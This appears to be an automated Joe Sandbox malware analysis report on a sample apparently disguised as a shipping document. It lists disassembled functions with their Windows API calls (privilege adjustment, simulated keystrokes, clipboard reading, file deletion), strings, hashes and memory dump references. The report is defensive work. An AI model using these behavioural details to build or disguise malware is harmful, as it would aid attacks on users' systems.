Opcode ID: 7dd7db3f2349173149a0d7d4670cb5ca3643c740175deaa2a871e412d8ea9c89
Instruction ID: b831a9555f53983cd9a7e1aae7a9f52a4fc69714310bbc170fb282ce17028aa0
Opcode Fuzzy Hash: 7dd7db3f2349173149a0d7d4670cb5ca3643c740175deaa2a871e412d8ea9c89
Instruction Fuzzy Hash: AEE0CD365002245BC711B798CC46FEA77ADDF88690F064175FA05D7244DD64DD818694

Function 006CBCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 006CBD16

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction ID: a6a461fb1d6a66cf7792186c3976dff0f69d3da140a367c720e7bd3ae29bbb44
Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction Fuzzy Hash: CCE092B0104B409BD7348A24D801BF373E1EF06305F00085DF2AB83341EB627C418A59

Function 00F040C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00F040D3

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 69208d6ab91aa791c2d0c073579aba71ca542b56337e7ef8beb7b234878b2823
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 85E08671A0D108DBCB10CAAC89046AA77A4A704320F104664AB05D35C0D531AD10F650

Function 00F04098 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00F040A3

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: cb928759c3e229aab86715e3add96126ec5001c4cdd91b7b63423ffae61f5897
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: BFD05E7190520CEBCB10DAA49904A9973A89705320F108754EE16932C0D532A904B795

Function 00F05A84 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F05A99

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 999b7be84762365e83e7b9780f1eb7a274ff0ab2076e2801c3baec9eac271a21
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 57E0BF7494110DEFDB00DFA4D5496DE7BB4EF04701F1006A1FD05D7681DB709E549A62

Function 00F05A88 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F05A99

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: e18c4eb2b7572e71c50dc6b9f506ba1e4f0cb04f2a8d4ed383b20f98c0deaec7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: B9E0E67494110DDFDB00DFB4D54969E7BB4EF04701F100261FD01D2281D7709D509A62

Non-executed Functions

Function 006EF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 006EF87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006EF8DC
GetWindowLongW.USER32(?,000000F0), ref: 006EF919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006EF940
SendMessageW.USER32 ref: 006EF966
_wcsncpy.LIBCMT ref: 006EF9D2
GetKeyState.USER32(00000011), ref: 006EF9F3
GetKeyState.USER32(00000009), ref: 006EFA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006EFA16
GetKeyState.USER32(00000010), ref: 006EFA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006EFA4F
SendMessageW.USER32 ref: 006EFA72
SendMessageW.USER32(?,00001030,?,006EE059), ref: 006EFB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 006EFB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006EFB96
SetCapture.USER32(?), ref: 006EFB9F
ClientToScreen.USER32(?,?), ref: 006EFC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006EFC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 006EFC29
ReleaseCapture.USER32 ref: 006EFC34
GetCursorPos.USER32(?), ref: 006EFC69
ScreenToClient.USER32(?,?), ref: 006EFC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 006EFCD8
SendMessageW.USER32 ref: 006EFD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 006EFD41
SendMessageW.USER32 ref: 006EFD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006EFD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 006EFD8F
GetCursorPos.USER32(?), ref: 006EFDB0
ScreenToClient.USER32(?,?), ref: 006EFDBD
GetParent.USER32(?), ref: 006EFDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 006EFE3F
SendMessageW.USER32 ref: 006EFE6F
ClientToScreen.USER32(?,?), ref: 006EFEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006EFEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 006EFF19
SendMessageW.USER32 ref: 006EFF3C
ClientToScreen.USER32(?,?), ref: 006EFF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006EFFB6
GetWindowLongW.USER32(?,000000F0), ref: 006F004B

Strings

F, xrefs: 006EFF42
@GUI_DRAGID, xrefs: 006EFBCC

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: bf6b40f046068f1de97eb2ccd587f0302e1b57ea0ceef9394551862a29d77947
Instruction ID: d5760a4c6f80d8b6d2c2d35858557d942569e0c74d9e8b436767c756523a56ab
Opcode Fuzzy Hash: bf6b40f046068f1de97eb2ccd587f0302e1b57ea0ceef9394551862a29d77947
Instruction Fuzzy Hash: A832CC74605385EFDB20DF68C884AAABBBAFF49344F144629F695872E1CB31DC41CB52

Function 006EAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 006EB1CD

Strings

%d/%02d/%02d, xrefs: 006EAEFC

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: ba82b5a5faa8898f3117eb79ee9597cdde02aeafa32d319af8f004885dcb963a
Instruction ID: d2d6d4b02b54b3ddc6077419d6212257cba57b744a3ccac67559e9cbf49d3d48
Opcode Fuzzy Hash: ba82b5a5faa8898f3117eb79ee9597cdde02aeafa32d319af8f004885dcb963a
Instruction Fuzzy Hash: FA12FF70501348ABEB249FA6DC49FEB7BBAFF45720F108219F906DA2D1DB749802CB11

Function 0069EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0069EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006F3AEA
IsIconic.USER32(000000FF), ref: 006F3AF3
ShowWindow.USER32(000000FF,00000009), ref: 006F3B00
SetForegroundWindow.USER32(000000FF), ref: 006F3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006F3B20
GetCurrentThreadId.KERNEL32 ref: 006F3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 006F3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 006F3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 006F3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 006F3B54
SetForegroundWindow.USER32(000000FF), ref: 006F3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 006F3B6C
keybd_event.USER32(00000012,00000000), ref: 006F3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 006F3B81
keybd_event.USER32(00000012,00000000), ref: 006F3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 006F3B8F
keybd_event.USER32(00000012,00000000), ref: 006F3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 006F3B9E
keybd_event.USER32(00000012,00000000), ref: 006F3BA3
SetForegroundWindow.USER32(000000FF), ref: 006F3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 006F3BCD

Strings

Shell_TrayWnd, xrefs: 006F3AE5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 1cd1391195238f949c17bb936eda5c5926d0e946127d5e2e9f8960f66d08535b
Instruction ID: 70326896273939b3bc8d02703d4d4bc170d78577897a68397ce84492724b6c7c
Opcode Fuzzy Hash: 1cd1391195238f949c17bb936eda5c5926d0e946127d5e2e9f8960f66d08535b
Instruction Fuzzy Hash: 0F319271A4031CBFEB305BA58C49FBE3E6DEB44B50F108115FA04EA2D0DAB55D11AAA4

Function 006BACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 006BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006BB180
Part of subcall function 006BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006BB1AD
Part of subcall function 006BB134: GetLastError.KERNEL32 ref: 006BB1BA

_memset.LIBCMT ref: 006BAD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006BAD5A
CloseHandle.KERNEL32(?), ref: 006BAD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006BAD82
GetProcessWindowStation.USER32 ref: 006BAD9B
SetProcessWindowStation.USER32(00000000), ref: 006BADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006BADBF

Part of subcall function 006BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006BACC0), ref: 006BAB99
Part of subcall function 006BAB84: CloseHandle.KERNEL32(?,?,006BACC0), ref: 006BABAB

Strings

H*s, xrefs: 006BAE40
default, xrefs: 006BADBA
winsta0, xrefs: 006BAD7D
, xrefs: 006BAD17

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*s$default$winsta0
API String ID: 2063423040-1693231531
Opcode ID: 3f17dc0d09cc0bb991894f3264cb67ba6c79d98eb84fc05f2550202a30c19691
Instruction ID: dc1099ab5eef39d4f75c95f140a29472d97d6eb0c78cca7fce73d08c50d03158
Opcode Fuzzy Hash: 3f17dc0d09cc0bb991894f3264cb67ba6c79d98eb84fc05f2550202a30c19691
Instruction Fuzzy Hash: 388191B1800209EFEF21DFE4DC45AEEBB7AEF04304F048119F914A2261DB768E95DB25

Function 006C60DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006C5FA6,?), ref: 006C6ED8

Part of subcall function 006C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006C5FA6,?), ref: 006C6EF1

Part of subcall function 006C725E: __wsplitpath.LIBCMT ref: 006C727B
Part of subcall function 006C725E: __wsplitpath.LIBCMT ref: 006C728E

Part of subcall function 006C72CB: GetFileAttributesW.KERNEL32(?,006C6019), ref: 006C72CC

_wcscat.LIBCMT ref: 006C6149
_wcscat.LIBCMT ref: 006C6167
__wsplitpath.LIBCMT ref: 006C618E
FindFirstFileW.KERNEL32(?,?), ref: 006C61A4
_wcscpy.LIBCMT ref: 006C6209
_wcscat.LIBCMT ref: 006C621C
_wcscat.LIBCMT ref: 006C622F
lstrcmpiW.KERNEL32(?,?), ref: 006C625D
DeleteFileW.KERNEL32(?), ref: 006C626E
MoveFileW.KERNEL32(?,?), ref: 006C6289
MoveFileW.KERNEL32(?,?), ref: 006C6298
CopyFileW.KERNEL32(?,?,00000000), ref: 006C62AD
DeleteFileW.KERNEL32(?), ref: 006C62BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 006C62E1
FindClose.KERNEL32(00000000), ref: 006C62FD
FindClose.KERNEL32(00000000), ref: 006C630B

Strings

\*.*, xrefs: 006C6138, 006C6147, 006C6165
p1#v`K$v, xrefs: 006C61BA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*$p1#v`K$v
API String ID: 1917200108-1732502266
Opcode ID: d199e610a236f6a2c63064c43a05f66619de589b303b183aafa0fa861435bd57
Instruction ID: c23cd3a5f6081cf574f66f977045c652a9596fa16aa1eea845d27c021d9881d8
Opcode Fuzzy Hash: d199e610a236f6a2c63064c43a05f66619de589b303b183aafa0fa861435bd57
Instruction Fuzzy Hash: 63511F7280825CAADB21FB95CC44EEB77BDAF05300F0941EEF545E2141DE369B498FA8

Function 006D6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0071DC00), ref: 006D6B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 006D6B44
GetClipboardData.USER32(0000000D), ref: 006D6B4C
CloseClipboard.USER32 ref: 006D6B58
GlobalLock.KERNEL32(00000000), ref: 006D6B74
CloseClipboard.USER32 ref: 006D6B7E
GlobalUnlock.KERNEL32(00000000), ref: 006D6B93
IsClipboardFormatAvailable.USER32(00000001), ref: 006D6BA0
GetClipboardData.USER32(00000001), ref: 006D6BA8
GlobalLock.KERNEL32(00000000), ref: 006D6BB5
GlobalUnlock.KERNEL32(00000000), ref: 006D6BE9
CloseClipboard.USER32 ref: 006D6CF6

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 40f980a1453327b991f9fab6c4bd06a37c06f05c6ffc61b90791133686879759
Instruction ID: 47078943911e5045d95706c01e7f7bb5f605f8b42e9ef166cdb466e98571236e
Opcode Fuzzy Hash: 40f980a1453327b991f9fab6c4bd06a37c06f05c6ffc61b90791133686879759
Instruction Fuzzy Hash: 45519E71640301ABD310EBA0CD96F6E77AAAF84B10F00422EF546D62E1DF74DD058B6A

Function 006CF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 006CF62B
FindClose.KERNEL32(00000000), ref: 006CF67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006CF6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006CF6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 006CF6E2
__swprintf.LIBCMT ref: 006CF72E
__swprintf.LIBCMT ref: 006CF767
__swprintf.LIBCMT ref: 006CF7BB

Part of subcall function 006A172B: __woutput_l.LIBCMT ref: 006A1784

__swprintf.LIBCMT ref: 006CF809
__swprintf.LIBCMT ref: 006CF858
__swprintf.LIBCMT ref: 006CF8A7
__swprintf.LIBCMT ref: 006CF8F6

Strings

%4d, xrefs: 006CF761
%4d%02d%02d%02d%02d%02d, xrefs: 006CF728
%02d, xrefs: 006CF7B0, 006CF7B9, 006CF807, 006CF856, 006CF8A5, 006CF8F4

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: b76f84aa312e3fdc2527ae98a2a4a84294309a8ce67bcf4f1033b1b3b9820ca7
Instruction ID: 70f46dd06bdd26eb3a1334036f3bbc41915b82e602d7a200bcc2d3f81adb8403
Opcode Fuzzy Hash: b76f84aa312e3fdc2527ae98a2a4a84294309a8ce67bcf4f1033b1b3b9820ca7
Instruction Fuzzy Hash: DDA13DB2408344ABC750FBA5C895DAFB7EDAF98304F44092EB585C2152EB34D949CB66

Function 006D1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 006D1B50
_wcscmp.LIBCMT ref: 006D1B65
_wcscmp.LIBCMT ref: 006D1B7C
GetFileAttributesW.KERNEL32(?), ref: 006D1B8E
SetFileAttributesW.KERNEL32(?,?), ref: 006D1BA8
FindNextFileW.KERNEL32(00000000,?), ref: 006D1BC0
FindClose.KERNEL32(00000000), ref: 006D1BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 006D1BE7
_wcscmp.LIBCMT ref: 006D1C0E
_wcscmp.LIBCMT ref: 006D1C25
SetCurrentDirectoryW.KERNEL32(?), ref: 006D1C37
SetCurrentDirectoryW.KERNEL32(007339FC), ref: 006D1C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 006D1C5F
FindClose.KERNEL32(00000000), ref: 006D1C6C
FindClose.KERNEL32(00000000), ref: 006D1C7C

Strings

*.*, xrefs: 006D1BE2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: ce4b8b1a63f30d09110a903072b0ef5b6a8df9e46d89b558cd761da6e2756ef3
Instruction ID: 7b90572e207dc5f11fd53abef78ddc741ae0860ef174c43b037922475b455c01
Opcode Fuzzy Hash: ce4b8b1a63f30d09110a903072b0ef5b6a8df9e46d89b558cd761da6e2756ef3
Instruction Fuzzy Hash: E031E571A00219BBDB20ABE0DC48AEE77AD9F07320F004157E901D6290EBB8DF458A68

Function 006D1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 006D1CAB
_wcscmp.LIBCMT ref: 006D1CC0
_wcscmp.LIBCMT ref: 006D1CD7

Part of subcall function 006C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006C6BEF

FindNextFileW.KERNEL32(00000000,?), ref: 006D1D06
FindClose.KERNEL32(00000000), ref: 006D1D11
FindFirstFileW.KERNEL32(*.*,?), ref: 006D1D2D
_wcscmp.LIBCMT ref: 006D1D54
_wcscmp.LIBCMT ref: 006D1D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 006D1D7D
SetCurrentDirectoryW.KERNEL32(007339FC), ref: 006D1D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 006D1DA5
FindClose.KERNEL32(00000000), ref: 006D1DB2
FindClose.KERNEL32(00000000), ref: 006D1DC2

Strings

*.*, xrefs: 006D1D28

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 1b9fd4ea3d9fffae624266ebecdac29e85d04157e79c7ccbdc79c23988c83e4a
Instruction ID: d170b47b62a6f802f52dbe992735cd3addecbb3d6641c562b993fd0dcc5ab8ca
Opcode Fuzzy Hash: 1b9fd4ea3d9fffae624266ebecdac29e85d04157e79c7ccbdc79c23988c83e4a
Instruction Fuzzy Hash: 8F311671901219BADF20ABA0DC08ADE77AF9F07324F144556F800A6291DFB4DF458E68

Function 00687D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00687DBD

Strings

\, xrefs: 00687D89
\, xrefs: 00687E1D
[:>:]], xrefs: 00687D37
Q\E, xrefs: 006886D6
\, xrefs: 006FF95B
\b(?<=\w), xrefs: 006FF877
\b(?=\w), xrefs: 006FF85E
], xrefs: 00687D9F
^, xrefs: 00687D96
[, xrefs: 00687E14
